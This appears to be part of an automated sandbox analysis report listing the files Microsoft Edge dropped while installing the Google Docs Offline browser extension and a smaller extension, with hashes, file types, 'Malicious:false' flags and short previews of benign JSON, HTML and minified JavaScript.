                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                          MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                          SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                          SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                          SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):912
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                          MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                          SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                          SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                          SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):11406
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                          MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                          SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                          SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                          SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):854
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                          MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                          SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                          SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                          SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2525
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                          MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                          SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                          SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                          SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):97
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                          MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                          SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                          SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                          SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):122218
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                          MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                          SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                          SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                          SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):291
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                          MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                          SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                          SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                          SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):130866
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                          MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                          SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                          SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                          SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\e5e198b4-9cd7-4fd2-9ee5-f0779f20bd5a.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):154477
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                          MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                          SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                          SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                          SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_544803628\3e27e1ff-a48b-47f3-a173-0604e79c4d07.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):11185
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                          MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                          SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                          SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                          SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_544803628\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1753
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                          MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                          SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                          SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                          SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_544803628\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):9815
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                          MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                          SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                          SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                          SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                          Malicious:false
